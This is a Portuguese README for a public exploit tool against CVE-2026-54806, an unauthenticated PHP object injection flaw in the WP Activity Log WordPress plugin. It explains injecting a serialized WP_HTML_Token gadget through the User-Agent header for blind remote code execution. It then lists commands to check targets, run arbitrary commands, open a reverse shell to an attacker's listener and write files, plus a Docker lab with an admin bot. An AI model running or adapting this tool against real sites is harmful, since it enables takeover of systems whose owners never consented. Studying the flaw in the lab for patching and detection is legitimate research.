
Injeção de Objeto PHP não autenticada para RCE no WP Activity Log <= 5.6.3.1 (CVE-2026-54806)
CVE-2026-54806 é uma vulnerabilidade crítica (CVSS 9.8) de injeção de objeto PHP não autenticada no plugin WordPress WP Activity Log (wp-security-audit-log) da Melapress. Um atacante não autenticado pode injetar objetos PHP serializados através do cabeçalho User-Agent em qualquer requisição que dispare um evento registrado (ex.: uma tentativa de login mal-sucedida). O payload injetado é armazenado no banco de dados e desserializado sem restrições quando um administrador visita o painel do WordPress, levando à execução remota de código cega (nenhuma saída é retornada ao atacante).
Plugin afetado: WP Activity Log <= 5.6.3.1 (corrigido na versão 5.6.4)
Requerido para RCE: WordPress 6.4.0 - 6.4.1 — este PoC usa o gadget WP_HTML_Token, a única cadeia do núcleo do WP com todas as propriedades públicas que sobrevive ao sanitize_text_field() e se encaixa no limite de coluna de 255 caracteres.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
Laboratório auto-contido com WordPress 6.4.1 + WP Activity Log 5.6.3.1. Verifique DOCKER.md para detalhes.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
O laboratório inclui um admin-bot que visita o painel a cada 60 segundos, de modo que os payloads injetados disparam automaticamente — nenhuma interação manual necessária.
Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou danos causados por esta ferramenta.